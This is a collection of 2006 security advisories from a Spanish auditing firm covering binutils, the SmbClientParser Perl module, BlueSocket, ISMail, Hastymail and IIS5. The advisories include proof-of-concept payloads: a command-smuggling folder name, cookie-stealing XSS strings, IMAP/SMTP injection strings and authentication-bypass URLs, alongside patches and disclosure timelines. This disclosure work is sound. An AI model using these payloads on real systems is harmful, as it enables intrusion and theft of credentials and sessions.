Severity: 2/5
BACKGROUND
strings and dbg are some of the tools from the binutils package, it could be used to look-for printable strings in a binary file, debug and reverse engineering of executables.
http://www.gnu.org/software/binutils/
DESCRIPTION
A binary file can be protected from the strings usage.
Is it possible to make a binary file with some special chars in a variable, that when is compiled is imposible to extract the printable strings of the elf, using the strings tool. It will segfault or hang-up.
(gdb) r evil
Starting program: /usr/bin/strings evil
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
Program received signal SIGSEGV, Segmentation fault.
0xb7e9ecbd in bfd_hash_lookup () from /usr/lib/libbfd-2.16.1.so
(gdb)
The problem is in bfd_hack_lookup from libbfd-2.16.1.so library, at this snippet of code:
1fcb4: 31 c7 xor %eax,%edi
1fcb6: 89 f8 mov %edi,%eax
1fcb8: 8b 4d 08 mov 0x8(%ebp),%ecx
1fcbb: 31 d2 xor %edx,%edx
1fcbd: f7 71 04 divl 0x4(%ecx)
<--SIGSEGV with %253Cc%AAAAA%AAAAA%AAAAA%AAAAA%AAAAA%AAAAA
1fcc0: 01 d2 add %edx,%edx
1fcc2: 01 d2 add %edx,%edx
1fcc4: 89 55 e0 mov %edx,0xffffffe0(%ebp)
with %253Cc ecx gets 0x54 value, and it cannot access to this address.
It seems there is not exploitable -but it is under investigation-.
All versions are affected.
PROOF OF CONCEPT
This evil file cannot be scanned with strings command:
root@jolmos:/research# strings evil
Violacion de segmento
root@jolmos:/research# cat evil
%253Cc%253Cc%253Cc%253Cc%253Cc%253Cc%253Cc
root@jolmos:/research
BUSINESS IMPACT
-
SYSTEMS AFFECTED
Tested in some linux systems.
SOLUTION
There is a provisional patch at:
http://sourceware.org/bugzilla/attachment.cgi?id=978&action=view
REFERENCES
-
CREDITS
This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
April 18, 2006: Initial release.
April 26, 2006: The patch has been added at disclosure timeline.
DISCLOSURE TIMELINE
February 29, 2006 The vulnerability discovered by Internet Security Auditors (www.isecauditors.com)
April 18, 2006 Initial vendor notification sent (http://sourceware.org/bugzilla/show_bug.cgi?id=2584)
April 23, 2006 A provisional path was published (http://sourceware.org/bugzilla/attachment.cgi?id=978&action=view)
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
Volver al inicio
2006-006: SmbClientParser perl module allows remote command execution
Original release date: February 28, 2006
Last revised: July 18th, 2008
Discovered by: Jesus Olmos Gonzalez
Severity: 5/5
BACKGROUND
SmbClientParser is a useful perl module to writing Netbios interactive codes, is a wraper from linux smbclient command and can be downloaded from:
http://search.cpan.org/~alian/Filesys-SmbClientParser-2.7/SmbClientParser.pm
or installed:
perl -MCPAN -e shell
install Filesys::SmbClientParser
DESCRIPTION
If a host scans your shared folder whith a tool that uses this module, you can execute shell commands in his host.
This module has the following snippet of code:
pargs it is parsed with the following poor filters:
my $pargs;
if ($args=~/^([^;]*)$/) { # no ';' nickel
$pargs=$1;
} elsif ($smbscript) { # ';' is allowed inside -c ' '
if ($args=~/^([^;]* -c '[^']*'[^;]*)$/) {
$pargs=$1;
} else { # what that ?
die("Why a ';' here ? => $args");
}
} else { die("Why a ';' here ? => $args"); }
If thereis a folder inside a shared folder with the following name:
' x && xterm &#
The perl will spawn an xterm :)
Note that this was reported at 2006 and no answer received, be carefoul with cpan modules.
PROOF OF CONCEPT
This folder name inside the shared folder:
' x && xterm &#
Will execute the following:
/usr/bin/smbclient "//x.x.x.x/vulns" -U "user%pass" -d0 -c 'cd "' x && xterm &#"' -D "/poc"
This proof of concept spawns a xterm at vyctims xwindow, replace xterm for the evil commands.
BUSINESS IMPACT
-
SYSTEMS AFFECTED
Versions up to 2.7 included (all)
SOLUTION
Use this patch:
> #------------------------------------------------------------------------------
> # Sanitize (jolmos[@]isecauditors[.]com)
> #------------------------------------------------------------------------------
> sub Sanitize {
> my $danger = $_[0]; #There are many danger bytes, but if the
> $$danger =~ s/\n|\r|'|"|//ig; #danger string is inside "" or '' the only
> #option is break with ' or " or \r or \n
> }
265a274
> foreach my $i (@_) { &Sanitize(\$i); }
287a297
> foreach my $i (@_) { &Sanitize(\$i); }
321a332
> foreach my $i (@_) { &Sanitize(\$i); }
331a343
> foreach my $i (@_) { &Sanitize(\$i); }
345a358
> foreach my $i (@_) { &Sanitize(\$i); }
359a373
> foreach my $i (@_) { &Sanitize(\$i); }
373a388
> foreach my $i (@_) { &Sanitize(\$i); }
375a391
>
387a404
> foreach my $i (@_) { &Sanitize(\$i); }
398a416
> foreach my $i (@_) { &Sanitize(\$i); }
409a428
> foreach my $i (@_) { &Sanitize(\$i); }
487a507
> foreach my $i (@_) { &Sanitize(\$i); }
REFERENCES
http://search.cpan.org/~alian/Filesys-SmbClientParser-2.7
CREDITS
This vulnerability has been discovered and reported by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
April 26, 2006: Initial release.
July 14, 2008: Patch added.
DISCLOSURE TIMELINE
February 26, 2006: The vulnerability discovered by Internet Security Auditors.
April 26, 2006: Initial vendor notification sent.
September 14, 2006: Second notification: correction in one week. No correction.
December 2, 2006: Third notification: no response.
January 18, 2007: Forth notification: no response.
May 1, 2007: Fifth notification: no response.
November 11, 2007: Sixth notification: no response.
July 14, 2008: No response from the developer (Alain Barbet), we wrote the patch.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
Volver al inicio
2006-007: The BlueSocket web administration is vulnerable to a Cross Site Scripting attack
Original release Date: April 27th, 2006
Last revised: December 1st, 2006
Discovered by: Jesús Olmos González
Severity: 2/5
BACKGROUND
BSC 2100 product is included in the Blue Secure Family (www.bluesocket.com).
BlueSecure Controllers provide high-performance, reliable, policy-based WLAN security and management solutions that have been deployed by hundreds of large institutions, enterprises, and public access providers.
DESCRIPTION
The admin.pl perl code don't sanitize the imputs and then wen it tries to rewrite the username at the input, html + script code could be rewrited and executed by the browser.
This crossite is in the administration of the security product, it has been tested only in BSC 2100.
Is it possible to send a fake email to the admin spoofing the product address, saying that the configuration is not ok and sending the special link.
If the admin press the link and validate in aparently normal interface, his credentials will be sended to the attacker.
If this is done with a good social engineering will be a great risk.
PROOF OF CONCEPT
This POC will inject some html to modify the look and feel of the authentication, and attacker could inject script code to send back the credentials:
https://host.domain.com/admin.pl?ad_name=%22%3E%3Ch1%3EXSS%20BUG%3C/h1%3...
BUSINESS IMPACT
Credentials could be stolen due social engineering attacks.
SYSTEMS AFFECTED
Versions prior 5.2 or without 5.1.1-BluePatch
SOLUTION
Update to 5.2 version or apply 5.1.1-BluePatch
REFERENCES
Vulnerability item number 4484 in the Bluepatch V6 for 5.1.1.1 Release Notes.
CREDITS
This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
April 27, 2006: Initial vendor contact.
April 28, 2006: Vendor updates its near patch.
June 21, 2006: Publication of the patch.
September 16, 2006: Vendor confirms inclusion in referenced patch.
September 17, 2006: Advisory revised.
DISCLOSURE TIMELINE
April 26, 2006: The vulnerability discovered by Internet Security Auditors (www.isecauditors.com).
December 1, 2006: Advisory finally Published
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
Volver al inicio
2006-010: XSS vulnerability in error page of ISMail
Original release date: September 28, 2006
Last revised: December 1, 2006
Discovered by: Vicente Aguilera Díaz
Severity: 3/5
BACKGROUND
ISMail is a webmail system. Programmed in HTML and PHP, it is designed to work with any imap server.
ISMail requires that PHP 4.2+, compiled with and IMAP and Session support, be installed on the server that runs it.
You have a choice of data-store backends (xml, encrypted xml, mysql, and postgresql are included, each requiring their respective PHP modules), and miscellaneous other options that can make the Inside Systems Mail experience a little friendlier.
Unlike most other webmail programs, Inside Systems Mail is both quick and easy to use. The layout, complete with address book and folder options, is simple and familiar to most users.
For administrators, the data-stores and options are easily extensible so that Inside Systems Mail can be dropped in nearly any configuration with minimal extra coding.
DESCRIPTION
The error page "error.php" receives a parameter facilitated in the querystring that shows the error message.
This parameter ("error") can be manipulated by an attacker to inject arbitrary script/HTML code.
This is dangerous because it's possible to realize XSS's attacks to obtain the session cookies of authenticated users and to spoof his session, or deface the error page.
PROOF OF CONCEPT
Example of XSS attack:
?error=XSS%20attack%3Cscript%3Ealert(document.cookie);%3C/script%3E
BUSINESS IMPACT
An attacker can spoof the session of other authenticated users allowing to access to his mail, or deface the error page.
SYSTEMS AFFECTED
This vulnerability has been tested in the last version of ISMail (2.0, released on 2005-01-20).
Possibly all versions are affected by this vulnerability.
SOLUTION
Update version from the repository.
REFERENCES
http://www.insidesystems.net/projects/project.php?projectid=4
CREDITS
This vulnerability has been discovered and reported by
Vicente Aguilera Díaz (vaguilera (at) isecauditors (dot) com).
REVISION HISTORY
September 28, 2006: Initial release.
DISCLOSURE TIMELINE
September 27, 2006 The vulnerability discovered by Internet Security Auditors (www.isecauditors.com).
September 28, 2006 Initial vendor notification sent.
October 1, 2006 The vendor fixed the vulnerability in the repository.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
Volver al inicio
2006-011: IMAP/SMTP Injection in Hastymail
Original release date: September 28, 2006
Last revised: December 1, 2006
Discovered by: Vicente Aguilera Díaz
Severity: 3/5
BACKGROUND
Hastymail is yet another webmail IMAP client written in PHP. Hastymail is designed for speed, RFC compatibility, simplicity, and security. Our goal is to create a simple interface with powerful but easy to use options that make managing your IMAP account effective and fast.
Hastymail is NOT groupware. We are focused on being a functional and fast webmail client.
The product homepage is http://hastymail.sourceforge.net/
DESCRIPTION
Hastymail provides a graphical interface to interact with mail servers across the IMAP/SMTP protocols.
Improper command and information validation transmitted by Hastymail to the mail servers during the normal use of this application (for example, acceding to the mailbox) facilitates that an authenticate malicious user could inject arbitrary IMAP/SMTP commands into the mail servers used by Hastymail across parameters used by the webmail front-end in its communication with these mail servers.
This is become dangerous because the injection of these commands allows an intruder to evade restrictions imposed at application level, and exploit vulnerabilities that could exist in the mail servers through IMAP/SMTP commands.
PROOF OF CONCEPT
== IMAP Injection example (1.5 version) =============
Hastymail Vulnerable parameter: "mailbox" (and possibly others)
When a user access to a folder (for example, "INBOX"), he creates a GET request as:
?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX
A malicious user can modify the value of the "mailbox" parameter and inject any IMAP command.
The IMAP command injection has the following structure:
?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0a<ID>%20 \
<INJECT_IMAP_COMMAND_HERE>%0D%0A<ID>%20SELECT%20%2522INBOX
To observe that there has been in use double URL encoding for codifying the quote character (").
Example:
Injection of the CREATE IMAP command across the "mailbox" parameter:
?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX \
%2522%0d%0aA0003%20CREATE%2522INBOX.vad
== SMTP Injection example (1.5 version) =============
Hastymail Vulnerable parameter: "subject" (and possibly others)
When a user send a message, he create a POST request like:
...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept
-----------------------------84060780712450133071594948441
...
A malicious user can modify the value of the "subject" parameter and inject any SMTP command.
Example: Relay from a non-existent e-mail address.
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept
.
mail from: hacker@domain.com
rcpt to: victim@otherdomain.com
data
This is a proof of concept of the SMTP command injection in Hastymail
.
-----------------------------84060780712450133071594948441
...
BUSINESS IMPACT
The IMAP/SMTP command injection allow to exploit vulnerabilities in the IMAP/SMTP servers and evade all the restrictions at the application layer.
SYSTEMS AFFECTED
This vulnerability has been tested in:
SOLUTION
Apply the patch: http://hastymail.sourceforge.net/security.php
REFERENCES
http://hastymail.sourceforge.net/security.php
CREDITS
This vulnerability has been discovered and reported by
Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).
REVISION HISTORY
September 28, 2006: Initial release.
October 3, 2006: Project admin response.
October 9, 2006: Project admin publish the patch for 1.5 and 1.02 versions.
DISCLOSURE TIMELINE
September 28, 2006: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
December 1, 2006: Advisory published.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
Volver al inicio
2006-013: Microsoft IIS5 NTLM and Basic authentication bypass
Original release date: December 15, 2006
Last revised: May 22, 2007
Discovered by: Jesus Olmos Gonzalez
Severity: 5/5
BACKGROUND
Microsoft Internet Information Server Web Server can protect the private contents with a basic or NTLM authentication.
Many web pages, intranets and extranets rely on Microsoft security.
IISv5 has a "Hit-highlighting" functionality that opens some site object and highlights some part of it; that has had a transversal vulnerability in the past. Now it can be used to bypass the IIS authentication.
This is poorly documented at KnowledgeBase http://support.microsoft.com/kb/328832, the real impact is detailed above.
DESCRIPTION
Any Internet user can access the private web directories and files of any IISv5 web, by highlighting it with "Hit-highlighting". To use this functionality the user has to supply the CiWebhitsfile parameter to the null.htw object.
The null.htw object has to be accessed from a non-existant directory, for example http://anyiisweb.com/foo/null.htw
It is possible to use null.htw or other object specified at the CiTemplate template.
PROOF OF CONCEPT
https://anyiis5.com/authBypass/null.htw?CiWebhitsfile=/protectedfile.asp...
https://anyiis5.com/authBypass/null.htw?CiWebhitsfile=/some/secretfile.t...
BUSINESS IMPACT
The impact depends on the web contents. Attackers could gain access to all protected documents, and ASP code.
When an attacker accesses a trusted zone, the probability to get command execution is higher.
SYSTEMS AFFECTED
Internet Information Services Version 5, any Service Pack.
SOLUTION
Protect the files from the NTFS filesystem instead of relying on the IIS protection.
Microsoft recommends not to use IISv5.
REFERENCES
http://support.microsoft.com/kb/328832
CREDITS
This vulnerability has been discovered and reported
by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com)
REVISION HISTORY
December 15, 2006: Initial release
March 19, 2007: Latest revision
March 27, 2007: First notification to the vendor. Response: under revision.
April 11, 2007: The vendor considers little changes in their KB.
April 12, 2007: We accept it and propose add comments about the severity of the problem. Rejected.
May 21, 2007: Published. As the vendor information is not enough detailed.
DISCLOSURE TIMELINE
December 15, 2006: Vulnerability acquired by
Jesus Olmos Gonzalez (Internet Security Auditors)
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.